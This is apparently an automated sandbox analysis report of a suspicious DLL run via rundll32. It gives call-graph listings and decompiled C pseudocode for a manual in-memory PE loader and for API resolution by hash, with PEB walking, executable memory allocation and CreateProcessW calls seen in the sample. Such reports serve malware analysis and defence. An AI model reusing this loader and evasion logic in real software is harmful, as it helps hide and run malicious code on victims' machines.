RtlFreeHeap 21709->21710 21710->21707 21712 100163f2 21710->21712 21764 10017d62 66 API calls __getptd_noexit 21712->21764 21714 100163f7 GetLastError 21714->21707 21715 100163a3 ___sbh_find_block 21718 100163bd 21715->21718 21762 1001a5ed VirtualFree VirtualFree HeapFree __fptostr 21715->21762 21763 100163d6 LeaveCriticalSection _doexit 21718->21763 21719->21558 21720->21605 21721->21609 21723->21622 21724->21624 21725->21626 21726->21628 21727->21630 21728->21632 21729->21636 21730->21640 21731->21643 21733->21662 21734->21661 21736 10016a28 21735->21736 21737 10016a57 FreeEnvironmentStringsA 21736->21737 21738 10016a4f __VEC_memcpy 21736->21738 21737->21653 21738->21737 21739->21673 21740->21684 21741->21686 21743 1001710a _realloc 21742->21743 21744 10017141 _memset 21743->21744 21745 10017122 21743->21745 21749 100171b3 RtlAllocateHeap 21744->21749 21752 10017137 _realloc 21744->21752 21757 1001a549 66 API calls 2 library calls 21744->21757 21758 1001ad96 5 API calls 2 library calls 21744->21758 21759 100171fa LeaveCriticalSection _doexit 21744->21759 21760 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21744->21760 21755 10017d62 66 API calls __getptd_noexit 21745->21755 21747 10017127 21756 1001c596 4 API calls 2 library calls 21747->21756 21749->21744 21752->21701 21755->21747 21757->21744 21758->21744 21759->21744 21760->21744 21761->21715 21762->21718 21763->21709 21764->21714 21766 1001703b _malloc 66 API calls 21765->21766 21767 10008870 21766->21767 21768 10016380 __ioterm 66 API calls 21767->21768 21769 1000887c 21767->21769 21768->21769 21769->21584 21769->21587 21771 100170e8 21770->21771 21783 10017049 21770->21783 21803 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21771->21803 21773 1001705e 21773->21783 21796 1001e4dd 66 API calls __NMSG_WRITE 21773->21796 21797 1001e33d 66 API calls 6 library calls 21773->21797 21798 10017df0 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21773->21798 21774 100170ee 21804 10017d62 66 API calls __getptd_noexit 21774->21804 21777 100170f4 21777->21596 21780 100170ac RtlAllocateHeap 21780->21783 21782 100170df 21782->21596 21783->21773 21783->21780 21783->21782 21784 100170d3 21783->21784 21787 100170d1 21783->21787 21799 10016fec 66 API calls 4 library calls 21783->21799 21800 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21783->21800 21801 10017d62 66 API calls __getptd_noexit 21784->21801 21802 10017d62 66 API calls __getptd_noexit 21787->21802 21790 1001703b _malloc 66 API calls 21789->21790 21791 10002fc0 21790->21791 21791->21598 21805 10002900 21792->21805 21795->21586 21796->21773 21797->21773 21799->21783 21800->21783 21801->21787 21802->21782 21803->21774 21804->21777 21842 10001fe0 21805->21842 21808 10002943 SetLastError 21839 10002929 ShowWindow 21808->21839 21809 10002955 21810 10001fe0 ___DllMainCRTStartup SetLastError 21809->21810 21811 1000296e 21810->21811 21812 10002990 SetLastError 21811->21812 21813 100029a2 21811->21813 21811->21839 21812->21839 21814 100029b1 SetLastError 21813->21814 21815 100029c3 21813->21815 21814->21839 21816 100029ce SetLastError 21815->21816 21818 100029e0 GetNativeSystemInfo 21815->21818 21816->21839 21819 10002a94 SetLastError 21818->21819 21820 10002aa6 VirtualAlloc 21818->21820 21819->21839 21821 10002af2 GetProcessHeap HeapAlloc 21820->21821 21822 10002ac7 VirtualAlloc 21820->21822 21824 10002b2c 21821->21824 21825 10002b0c VirtualFree SetLastError 21821->21825 21822->21821 21823 10002ae3 SetLastError 21822->21823 21823->21839 21826 10001fe0 ___DllMainCRTStartup SetLastError 21824->21826 21825->21839 21827 10002b8e 21826->21827 21828 10002b92 21827->21828 21829 10002b9c VirtualAlloc 21827->21829 21880 10002ec0 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 21828->21880 21830 10002bcb ___DllMainCRTStartup 21829->21830 21845 10002010 21830->21845 21833 10002bff ___DllMainCRTStartup 21833->21828 21855 10002670 21833->21855 21837 10002c68 ___DllMainCRTStartup 21837->21828 21837->21839 21874 4756395 21837->21874 21839->21586 21840 10002ccf SetLastError 21840->21828 21843 10001ffb 21842->21843 21844 10001fef SetLastError 21842->21844 21843->21808 21843->21809 21843->21839 21844->21843 21847 10002040 21845->21847 21846 100020d3 21849 10001fe0 ___DllMainCRTStartup SetLastError 21846->21849 21847->21846 21848 1000207c VirtualAlloc 21847->21848 21854 100020f0 ___DllMainCRTStartup 21847->21854 21850 100020a0 21848->21850 21851 100020a7 ___DllMainCRTStartup 21848->21851 21852 100020ec 21849->21852 21850->21854 21851->21847 21853 100020f4 VirtualAlloc 21852->21853 21852->21854 21853->21854 21854->21833 21856 100026a9 IsBadReadPtr 21855->21856 21865 1000269f 21855->21865 21858 100026d3 21856->21858 21856->21865 21859 10002705 SetLastError 21858->21859 21860 10002719 21858->21860 21858->21865 21859->21865 21881 10001f00 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 21860->21881 21862 10002733 21863 1000273f SetLastError 21862->21863 21866 10002769 21862->21866 21863->21865 21865->21828 21868 10002300 21865->21868 21866->21865 21867 10002879 SetLastError 21866->21867 21867->21865 21872 10002348 ___DllMainCRTStartup 21868->21872 21869 10002451 21870 100021d0 ___DllMainCRTStartup 2 API calls 21869->21870 21873 1000242d 21870->21873 21872->21869 21872->21873 21882 100021d0 21872->21882 21873->21837 21875 475647e 21874->21875 21876 4756453 21874->21876 21875->21839 21875->21840 21889 475efdd 21876->21889 21880->21839 21881->21862 21883 100021ec 21882->21883 21887 100021e2 21882->21887 21885 10002254 VirtualProtect 21883->21885 21886 100021fa 21883->21886 21885->21887 21886->21887 21888 10002232 VirtualFree 21886->21888 21887->21872 21888->21887 21890 475f548 21889->21890 21893 4756466 21890->21893 21895 475f760 21890->21895 21899 475e1f8 GetPEB 21890->21899 21900 475fecb GetPEB 21890->21900 21905 476061d 21890->21905 21909 4741a34 21890->21909 21923 4760db1 GetPEB 21890->21923 21924 4762d0a GetPEB 21890->21924 21925 475fe2a 21890->21925 21929 474c307 GetPEB 21890->21929 21893->21875 21902 475d11a 21893->21902 21913 47585ff 21895->21913 21899->21890 21900->21890 21903 474eb52 GetPEB 21902->21903 21904 475d1b1 ExitProcess 21903->21904 21904->21875 21906 4760636 21905->21906 21930 474eb52 21906->21930 21910 4741a59 21909->21910 21911 474eb52 GetPEB 21910->21911 21912 4741aeb 21911->21912 21912->21890 21914 4758626 21913->21914 21915 475fe2a GetPEB 21914->21915 21916 475878e 21915->21916 21938 4762c24 21916->21938 21918 47587c7 21919 47587d2 21918->21919 21942 4761538 GetPEB 21918->21942 21919->21893 21921 47587ec 21943 4761538 GetPEB 21921->21943 21923->21890 21924->21890 21926 475fe3d 21925->21926 21944 474c28c 21926->21944 21929->21890 21931 474ec1b lstrcmpiW 21930->21931 21932 474ebf7 21930->21932 21931->21890 21936 475567b GetPEB 21932->21936 21934 474ec06 21937 474ec31 GetPEB 21934->21937 21936->21934 21937->21931 21939 4762c57 21938->21939 21940 474eb52 GetPEB 21939->21940 21941 4762ced CreateProcessW 21940->21941 21941->21918 21942->21921 21943->21919 21945 474c2a9 21944->21945 21948 47476e0 21945->21948 21949 47476f8 21948->21949 21950 474eb52 GetPEB 21949->21950 21951 4747793 21950->21951 21951->21890 21952 10013d98 21955 10013da4 __EH_prolog3 21952->21955 21954 10013df2 21979 1001398e EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 21954->21979 21955->21954 21963 10013a9b EnterCriticalSection 21955->21963 21977 1000a0db 2 API calls 4 library calls 21955->21977 21978 10013bab TlsAlloc InitializeCriticalSection 21955->21978 21957 10013dff 21960 10013e05 21957->21960 21961 10013e18 ~_Task_impl 21957->21961 21980 10013c4d 87 API calls 4 library calls 21960->21980 21968 10013aba 21963->21968 21964 10013b76 _memset 21965 10013b8a LeaveCriticalSection 21964->21965 21965->21955 21966 10013af3 21981 100134f9 21966->21981 21967 10013b08 GlobalHandle GlobalUnlock 21970 100134f9 ctype 80 API calls 21967->21970 21968->21964 21968->21966 21968->21967 21972 10013b25 GlobalReAlloc 21970->21972 21973 10013b2f 21972->21973 21974 10013b57 GlobalLock 21973->21974 21975 10013b48 LeaveCriticalSection 21973->21975 21976 10013b3a GlobalHandle GlobalLock 21973->21976 21974->21964 21975->21974 21976->21975 21977->21955 21978->21955 21979->21957 21980->21961 21982 1001350c ctype 21981->21982 21983 10013519 GlobalAlloc 21982->21983 21985 10001040 80 API calls 2 library calls 21982->21985 21983->21973 21985->21983

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 10002900-10002927 call 10001fe0 3 10002930-10002941 0->3 4 10002929-1000292b 0->4 6 10002943-10002950 SetLastError 3->6 7 10002955-10002970 call 10001fe0 3->7 5 10002d1a-10002d1d 4->5 6->5 10 10002972-10002974 7->10 11 10002979-1000298e 7->11 10->5 12 10002990-1000299d SetLastError 11->12 13 100029a2-100029af 11->13 12->5 14 100029b1-100029be SetLastError 13->14 15 100029c3-100029cc 13->15 14->5 16 100029e0-10002a01 15->16 17 100029ce-100029db SetLastError 15->17 18 10002a15-10002a1f 16->18 17->5 19 10002a21-10002a28 18->19 20 10002a57-10002a92 GetNativeSystemInfo 18->20 21 10002a38-10002a44 19->21 22 10002a2a-10002a36 19->22 23 10002a94-10002aa1 SetLastError 20->23 24 10002aa6-10002ac5 VirtualAlloc 20->24 25 10002a47-10002a4d 21->25 22->25 23->5 26 10002af2-10002b0a GetProcessHeap HeapAlloc 24->26 27 10002ac7-10002ae1 VirtualAlloc 24->27 28 10002a55 25->28 29 10002a4f-10002a52 25->29 31 10002b2c-10002b90 call 10001fe0 26->31 32 10002b0c-10002b27 VirtualFree SetLastError 26->32 27->26 30 10002ae3-10002aed SetLastError 27->30 28->18 29->28 30->5 36 10002b92 31->36 37 10002b9c-10002c01 VirtualAlloc call 10001e60 call 10002010 31->37 32->5 38 10002d0c-10002d18 call 10002ec0 36->38 45 10002c03 37->45 46 10002c0d-10002c1e 37->46 38->5 45->38 47 10002c20-10002c36 call 10002500 46->47 48 10002c38-10002c3b 46->48 50 10002c42-10002c50 call 10002670 47->50 48->50 54 10002c52 50->54 55 10002c5c-10002c6a call 10002300 50->55 54->38 58 10002c76-10002c84 call 10002480 55->58 59 10002c6c 55->59 62 10002c86 58->62 63 10002c8d-10002c96 58->63 59->38 62->38 64 10002c98-10002c9f 63->64 65 10002cfd-10002d00 63->65 67 10002ca1-10002cc3 call 4756395 64->67 68 10002cea-10002cf8 64->68 66 10002d07-10002d0a 65->66 66->5 70 10002cc6-10002ccd 67->70 69 10002cfb 68->69 69->66 71 10002cde-10002ce8 70->71 72 10002ccf-10002cda SetLastError 70->72 71->69 72->38
                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				signed short* _v16;
                                                                                                                                                                            				void* _v20;
                                                                                                                                                                            				void* _v24;
                                                                                                                                                                            				long _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				void* _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr* _v80;
                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                            				void* _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                            				void* _t180;
                                                                                                                                                                            				void* _t191;
                                                                                                                                                                            				void* _t198;
                                                                                                                                                                            				void* _t202;
                                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                                            				void* _t220;
                                                                                                                                                                            				intOrPtr _t269;
                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                            				intOrPtr _t326;
                                                                                                                                                                            
                                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                                            				_v72 = 0;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				if(E10001FE0(_v100, _a8, 0x40) != 0) {
                                                                                                                                                                            					_v16 = _a4;
                                                                                                                                                                            					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                                            						_t10 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                                                                            							_t15 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            							_v80 = _a4 +  *_t15;
                                                                                                                                                                            							if( *_v80 == 0x4550) {
                                                                                                                                                                            								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                                            									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                                            										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                            										_v32 =  *(_v80 + 0x38);
                                                                                                                                                                            										_v12 = 0;
                                                                                                                                                                            										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                                                                            											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                                                                            											}
                                                                                                                                                                            											if(_v88 > _v20) {
                                                                                                                                                                            												_v20 = _v88;
                                                                                                                                                                            											}
                                                                                                                                                                            											_v12 = _v12 + 1;
                                                                                                                                                                            											_v84 = _v84 + 0x28;
                                                                                                                                                                            										}
                                                                                                                                                                            										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
                                                                                                                                                                            										_t65 = _v64 - 1; // -1
                                                                                                                                                                            										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                                                                            											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                                                                            											_v24 = _t180;
                                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                                            												L26:
                                                                                                                                                                            												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                                            												if(_v72 != 0) {
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                                                                            													asm("sbb edx, edx");
                                                                                                                                                                            													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                                                                            													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                                                                            														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                                                                            														_v8 = _t191;
                                                                                                                                                                            														E10001E60(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                                                                            														_t115 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            														 *_v72 = _v8 +  *_t115;
                                                                                                                                                                            														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                                                                            														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                                                                            														if(_t198 != 0) {
                                                                                                                                                                            															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                                                                            															_v76 = _t269;
                                                                                                                                                                            															if(_t269 == 0) {
                                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                                                                            															} else {
                                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
                                                                                                                                                                            															}
                                                                                                                                                                            															if(E10002670(_v100, _v72) != 0) {
                                                                                                                                                                            																_t202 = E10002300(_v100, _v72); // executed
                                                                                                                                                                            																if(_t202 != 0) {
                                                                                                                                                                            																	if(E10002480(_v100, _v72) != 0) {
                                                                                                                                                                            																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                                                                            																			 *(_v72 + 0x2c) = 0;
                                                                                                                                                                            																			L49:
                                                                                                                                                                            																			return _v72;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		if( *(_v72 + 0x14) == 0) {
                                                                                                                                                                            																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                                            																			L47:
                                                                                                                                                                            																			goto L49;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                                            																		_t209 =  *0x10058ed8; // 0x0
                                                                                                                                                                            																		_t278 =  *0x10058ed4; // 0x1
                                                                                                                                                                            																		_t326 =  *0x10058ed0; // 0x10000000
                                                                                                                                                                            																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                                                                            																		if(_v92 != 0) {
                                                                                                                                                                            																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                                                                            																			goto L47;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		SetLastError(0x45a);
                                                                                                                                                                            																		L50:
                                                                                                                                                                            																		E10002EC0(_v100, _v72);
                                                                                                                                                                            																		return 0;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	goto L50;
                                                                                                                                                                            																}
                                                                                                                                                                            																goto L50;
                                                                                                                                                                            															}
                                                                                                                                                                            															goto L50;
                                                                                                                                                                            														}
                                                                                                                                                                            														goto L50;
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L50;
                                                                                                                                                                            												}
                                                                                                                                                                            												VirtualFree(_v24, 0, 0x8000);
                                                                                                                                                                            												SetLastError(0xe);
                                                                                                                                                                            												return 0;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                                                                            											_v24 = _t220;
                                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                                            												goto L26;
                                                                                                                                                                            											}
                                                                                                                                                                            											SetLastError(0xe);
                                                                                                                                                                            											return 0;
                                                                                                                                                                            										}
                                                                                                                                                                            										SetLastError(0xc1);
                                                                                                                                                                            										return 0;
                                                                                                                                                                            									}
                                                                                                                                                                            									SetLastError(0xc1);
                                                                                                                                                                            									return 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								SetLastError(0xc1);
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							SetLastError(0xc1);
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					SetLastError(0xc1);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}





























                                                                                                                                                                            0x10002906
                                                                                                                                                                            0x10002909
                                                                                                                                                                            0x10002910
                                                                                                                                                                            0x10002927
                                                                                                                                                                            0x10002933
                                                                                                                                                                            0x10002941
                                                                                                                                                                            0x10002958
                                                                                                                                                                            0x10002970
                                                                                                                                                                            0x1000297f
                                                                                                                                                                            0x10002982
                                                                                                                                                                            0x1000298e
                                                                                                                                                                            0x100029af
                                                                                                                                                                            0x100029cc
                                                                                                                                                                            0x100029ee
                                                                                                                                                                            0x100029f7
                                                                                                                                                                            0x100029fa
                                                                                                                                                                            0x10002a15
                                                                                                                                                                            0x10002a28
                                                                                                                                                                            0x10002a44
                                                                                                                                                                            0x10002a2a
                                                                                                                                                                            0x10002a33
                                                                                                                                                                            0x10002a33
                                                                                                                                                                            0x10002a4d
                                                                                                                                                                            0x10002a52
                                                                                                                                                                            0x10002a52
                                                                                                                                                                            0x10002a09
                                                                                                                                                                            0x10002a12
                                                                                                                                                                            0x10002a12
                                                                                                                                                                            0x10002a5b
                                                                                                                                                                            0x10002a78
                                                                                                                                                                            0x10002a81
                                                                                                                                                                            0x10002a92
                                                                                                                                                                            0x10002ab8
                                                                                                                                                                            0x10002abe
                                                                                                                                                                            0x10002ac5
                                                                                                                                                                            0x10002af2
                                                                                                                                                                            0x10002b03
                                                                                                                                                                            0x10002b0a
                                                                                                                                                                            0x10002b32
                                                                                                                                                                            0x10002b44
                                                                                                                                                                            0x10002b4b
                                                                                                                                                                            0x10002b54
                                                                                                                                                                            0x10002b5d
                                                                                                                                                                            0x10002b66
                                                                                                                                                                            0x10002b6f
                                                                                                                                                                            0x10002b78
                                                                                                                                                                            0x10002b90
                                                                                                                                                                            0x10002bae
                                                                                                                                                                            0x10002bb4
                                                                                                                                                                            0x10002bc6
                                                                                                                                                                            0x10002bd4
                                                                                                                                                                            0x10002bda
                                                                                                                                                                            0x10002be4
                                                                                                                                                                            0x10002bfa
                                                                                                                                                                            0x10002c01
                                                                                                                                                                            0x10002c18
                                                                                                                                                                            0x10002c1b
                                                                                                                                                                            0x10002c1e
                                                                                                                                                                            0x10002c3b
                                                                                                                                                                            0x10002c20
                                                                                                                                                                            0x10002c33
                                                                                                                                                                            0x10002c33
                                                                                                                                                                            0x10002c50
                                                                                                                                                                            0x10002c63
                                                                                                                                                                            0x10002c6a
                                                                                                                                                                            0x10002c84
                                                                                                                                                                            0x10002c96
                                                                                                                                                                            0x10002d00
                                                                                                                                                                            0x10002d07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002d07
                                                                                                                                                                            0x10002c9f
                                                                                                                                                                            0x10002cf8
                                                                                                                                                                            0x10002cfb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002cfb
                                                                                                                                                                            0x10002cac
                                                                                                                                                                            0x10002caf
                                                                                                                                                                            0x10002cb5
                                                                                                                                                                            0x10002cbc
                                                                                                                                                                            0x10002cc6
                                                                                                                                                                            0x10002ccd
                                                                                                                                                                            0x10002ce1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ce1
                                                                                                                                                                            0x10002cd4
                                                                                                                                                                            0x10002d0c
                                                                                                                                                                            0x10002d13
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002d18
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c86
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c6c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c52
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c03
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002b92
                                                                                                                                                                            0x10002b17
                                                                                                                                                                            0x10002b1f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002b25
                                                                                                                                                                            0x10002ad4
                                                                                                                                                                            0x10002ada
                                                                                                                                                                            0x10002ae1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ae5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002aeb
                                                                                                                                                                            0x10002a99
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002a9f
                                                                                                                                                                            0x100029d3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100029d9
                                                                                                                                                                            0x100029b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100029bc
                                                                                                                                                                            0x10002995
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000299b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002972
                                                                                                                                                                            0x10002948
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000294e
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1
                                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                                                                                            • Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
                                                                                                                                                                            • Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                                                                                            • Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				struct HWND__* _v28;
                                                                                                                                                                            				struct HWND__* _v32;
                                                                                                                                                                            				long _v36;
                                                                                                                                                                            				int _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				void* _t38;
                                                                                                                                                                            				long _t45;
                                                                                                                                                                            				long _t47;
                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                            				void* _t63;
                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                            
                                                                                                                                                                            				_t79 = __esi;
                                                                                                                                                                            				_t78 = __edi;
                                                                                                                                                                            				_t64 = __ebx;
                                                                                                                                                                            				_v56 = _a8;
                                                                                                                                                                            				 *0x10058ed0 = _a4;
                                                                                                                                                                            				_t72 = _a8;
                                                                                                                                                                            				 *0x10058ed4 = _a8;
                                                                                                                                                                            				 *0x10058ed8 = _a12;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_t38 = E10008860(__eflags); // executed
                                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                                            					_push(0x10029b4c);
                                                                                                                                                                            					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x10056f08 = 0;
                                                                                                                                                                            				 *0x10056f0c = 0;
                                                                                                                                                                            				 *0x10056f10 = 0;
                                                                                                                                                                            				 *0x10056f18 = 0;
                                                                                                                                                                            				 *0x10056f14 = 0;
                                                                                                                                                                            				_v40 = 0x44368d;
                                                                                                                                                                            				_v52 = 0x3f8fc5;
                                                                                                                                                                            				_v20 = 0x3b272b;
                                                                                                                                                                            				_v24 = 0x2feb60;
                                                                                                                                                                            				_v44 = 0xdd3c;
                                                                                                                                                                            				_v48 = 0x47c;
                                                                                                                                                                            				_v36 = 0x24e00;
                                                                                                                                                                            				_v28 = E10006170(L"kernel32.dll");
                                                                                                                                                                            				_v32 = E10006170(L"ntdll.dll");
                                                                                                                                                                            				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
                                                                                                                                                                            				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
                                                                                                                                                                            				_t95 =  *0x10058eb8;
                                                                                                                                                                            				if( *0x10058eb8 == 0) {
                                                                                                                                                                            					_t45 = E10017716(0x10029b18);
                                                                                                                                                                            					_t47 = E10017716("8192") | 0x00001000;
                                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                                            					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
                                                                                                                                                                            					_v12 = _t63;
                                                                                                                                                                            				}
